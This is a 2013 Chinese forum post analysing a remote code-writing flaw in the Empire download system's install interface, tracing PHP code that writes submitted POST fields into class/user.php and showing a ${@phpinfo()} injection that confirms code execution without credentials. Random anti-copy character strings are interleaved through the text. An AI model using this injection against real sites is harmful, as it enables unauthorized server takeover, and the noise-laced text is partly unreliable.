这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们7 n: K) Z! y8 Z2 g, f
5 E3 V& d6 b( i: R3 D
! n& a( I2 J2 s; A这是帝国的一套下载系统 如图/ i+ w$ X% a b
ps(不需要任何账户和密码,直接写shell)
* M" L% P' _; J7 B. y% l; h
由于很多站是由于下载要整合discuz 等等一些论坛....0 ^* f1 H3 A+ T! }2 C
3 \* S) G# ]6 v/ f _
而帝国他又有一个万能接口,如图
0 s1 [: ?( w5 W) c: A: x+ y; s6 l/ s4 A
" R- ~& p' Z3 E4 M# K( t而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码" G$ \$ p: ?8 s7 R
( C' k% E7 ~: N5 s9 L5 ^
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪
$ Q7 I' H9 T) o: @9 G. m4 q& h6 [9 I6 X9 y' X
在data/fun.php中的15行9 U; w/ r4 P2 r! @9 D! {
) q* u$ X7 Y- Z7 f
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {
8 o! {/ e1 P! e5 H5 A17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
7 B. [) B# Z& _& T& f
, |- {. R. w1 ~6 W+ m* x这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);. v& p/ M4 e" @9 b1 |
9 e% M3 Y v7 O$ S0 {5 C他将传进来的变量进行了切割,然后赋给了$filetext, t$ x7 Y/ J1 j; w2 m' E- x
& `8 O5 p% s5 | [ v$ D) Z
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
2 A+ F* o5 H+ v, O$ [( V: v, O N# A
我们看看写入的结果,随便填一个 # }5 w# L1 |' L
& H8 d1 H R8 r2 U. q! \% x. K8 L& H7 }# x
0 k1 G4 V) L& ~: a" A) c
5 T R' { ^! D/ Y+ O. R1 E5 P" }/ R1 ^- K% e" v$ w) o, R
. z1 g0 ~7 ~- ]% {8 u Y
8 O9 Z# l* u0 V
* r% l$ w8 E* j1 O# i. E, k7 ]4 k! T& i
- @. ~6 [+ t V3 ]9 s- G- }4 j
, N0 v7 ]1 ]4 Y5 ]1 \; z+ z# J0 p! M: _ ^
5 \3 g6 s3 X% c6 B3 p6 ^9 J" Q( F$ Y! S, B
0 M1 g. H+ b9 o% h
9 b5 z) T8 o8 @7 m) e n3 j
) Q6 j& ]" s7 h. b
# q5 E: s" t+ F. q7 k8 G6 \- Z
" g& `0 Y: }) s+ s4 k x# }4 f5 }0 u8 P2 {. N5 ]
, g; ^, k5 z+ S5 [所以我们淫荡点,写个${@phpinfo()}试试 4 O3 X2 T5 X: @2 ], R; M/ o7 p
然后访问以下class/user.php这个文件
, X% ^' l; _4 J1 n7 h2 z* f! |3 s日了吧 2 L, [1 f( Y0 D2 l+ z
/ t9 }6 J; x6 ]* a+ I0 M. ^. D% a4 Z0 I# u; T ?* E' o- A. L
, j0 F! ~+ H. o
$ L8 ]* ~# v5 @: x
. l5 C+ {0 D; |0 c4 X8 `* O | 
发表于 2013-1-23 09:34:37
收藏
支持
反对